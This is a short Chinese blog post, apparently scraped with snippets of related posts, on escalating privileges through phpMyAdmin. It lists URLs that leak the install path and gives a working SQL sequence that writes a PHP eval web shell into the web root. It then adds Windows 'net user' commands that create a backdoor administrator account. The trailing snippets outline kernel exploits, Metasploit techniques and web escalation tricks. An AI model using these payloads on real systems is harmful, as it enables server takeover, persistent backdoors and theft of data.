利用phpMyAdmin提权

利用phpMyAdmin提权

发表于 2016-03-31   |   分类于 phpMyAdmin  |   暂无评论  |   9次阅读

爆路径

  • /phpmyadmin/libraries/lect_lang.lib.php
  • /phpMyAdmin/index.php?lang[]=1
  • /phpMyAdmin/phpinfo.php
  • /load_file()
  • /phpmyadmin/themes/darkblue_orange/layout.inc.php
  • /phpmyadmin/libraries/select_lang.lib.php
  • /phpmyadmin/libraries/lect_lang.lib.php
  • /phpmyadmin/libraries/mcrypt.lib.php

得到物理路径 C:\wamp\www\phpmyadmin\themes\darkblue_orange\layout.inc.php

写马

1234
Create TABLE a (cmd text NOT NULL);Insert INTO a (cmd) VALUES("<?php eval($_POST[Cknife]);?>");select cmd from a into outfile "C:/wamp/www/phpmyadmin/d.php";Drop TABLE IF EXISTS a;

获得webshell

最后用Cknife连接,创建帐户并添加到管理员用户组
net user admin admin /add
net localgroup administrator admin /add

#phpMyAdmin

原文链接:http://blog.alpace.xyz/2016/03/31/20160331/

时间: 2024-10-11 23:27:42

利用phpMyAdmin提权的相关文章

小白日记24:kali渗透测试之提权(四)--利用漏洞提权

利用漏洞提权实例 前提:已渗透进一个XP或2003系统 一.实验目标漏洞:Ms11-080 补丁:Kb2592799 漏洞信息:https://technet.microsoft.com/library/security/ms11-080 1.通过searchsploit命令查找漏洞 [注:查找漏洞的命令行窗口要能完全显示Title和Path] #有python和ruby两种漏洞利用代码,可根据自己喜好选择,本章选择python 2.通过Sandi查找 查看漏洞利用代码的描述 #通过Afd.sy

Redhat利用漏洞提权

漏洞试用系统:redhat 5-6通用 一.利用/tmp拥有777的权限 在/tmp下创建一个exploit目录 ln   /bin/ping(ping命令的权限很特殊是S,可以在普通用户使用这个命令的时候瞬间拥有这个命令的属主权限,这里是root) ln /bin/ping  /tmp/exploit/target exec  3<  /tmp/exploit/target rm  -rf  /tmp/exploit/ 二.vim编写一段C语言程序(文件名payload.c) void  __

【安全牛学习笔记】利用配置不当提权

┃利用漏洞提权 ┃Ubuntu11.10 ┃http://old-releases.ubuntu.com/releases/11.10/ ┃gcc ┃sudo apt-cdrom add && sudo apt-get install gcc ┃gcc 18411.c -o exp ┃CVE-2012-0056 ┃/proc/pid/mem ┃kernels >=2.6.39 ┃http://blog.zx2c4.com/749 [email protected]:~# search

提权笔记本

/* 转载请注明出处 ID:珍惜少年时 */ 21------------FTP //找到其FTP目录,破解其密码搜索,提之 22------------linux终端 23------------telnet //可以爆破,然后dos连接之,连接后添加用户开启终端端口,然后宣告拿下! 1433----------mssql提权 //需要找到sa密码,一般存在于web.config文件中,uid pwd sa为关键字,找到该文件后Ctrl+f搜索关键字提之 3306----------mysql

kali实战-提权

加Q群交流kali Q群:108186516 1:本地提权 2:ADMIN提权为SYSTEM 3:注入进程提权 4:抓包嗅探 5:键盘记录 6:本地缓存密码 7:Windows身份认证 8:Windows Credential Editor 9:其他工具 10:利用漏洞提权 11:利用漏洞提权 12:利用配置不当提权 13:基本信息收集 14:WMIC和收集敏感数据 15:隐藏痕迹 http://edu.aqniu.com/course/295

metasploit下Windows下多种提权方式

前言 当你在爱害者的机器上执行一些操作时,发现有一些操作被拒绝执行,为了获得受害机器的完全权限,你需要绕过限制,获取本来没有的一些权限,这些权限可以用来删除文件,查看私有信息,或者安装特殊程序,比如病毒.Metasploit有很多种后渗透方法,可以用于对目标机器的权限绕过,最终获取到系统权限. 环境要求: 1.攻击机:kali linux 2.目标机:Win 7 在已经获取到一个meterpreter shell后,假如session为1,且权限不是系统权限的前提下,使用以下列出的几种提权方法:

web提权笔记

[ web提权 ] 1.能不能执行cmd就看这个命令:net user,net不行就用net1,再不行就上传一个net到可写可读目录,执行/c c:\windows\temp\cookies\net1.exe user 2.当提权成功,3389没开的情况下,上传开3389的vps没成功时,试试上传rootkit.asp 用刚提权的用户登录进去就是system权限,再试试一般就可以了. 3.cmd拒绝访问的话就自己上传一个cmd.exe 自己上传的后缀是不限制后缀的,cmd.exe/cmd.com

提权系列(一)----Windows Service 服务器提权初识与exp提权,mysql提权

一.初识提权 很多时候我们入侵一个网站的时候,想要的是得到这个服务器的权限,也就是admin权限,但是一般默认得到的是普通用的地权限,权限很小,所以就要通过其他手段,提升自己的权限. 提权是将服务器的普通用户提升为管理员用户的一种操作,提权常常用于辅助旁注攻击. 下面我们来了解下window的权限(来自百度百科): Windows 提供了非常细致的权限控制项,能够精确定制用户对资源的访问控制能力,大多数的权限从其名称上就可以基本了解其所能实现的内容. " 权限"(Permission)

web提权思路

1.能不能执行cmd就看这个命令:net user,net不行就用net1,再不行就上传一个net到可写可读目录,执行/c c:\windows\temp\cookies\net1.exe user 2.当提权成功,3389没开的情况下,上传开3389的vps没成功时,试试上传rootkit.asp 用刚提权的用户登录进去就是system权限,再试试一般就可以了. 3.cmd拒绝访问的话就自己上传一个cmd.exe 自己上传的后缀是不限制后缀的,cmd.exe/cmd.com/cmd.txt 都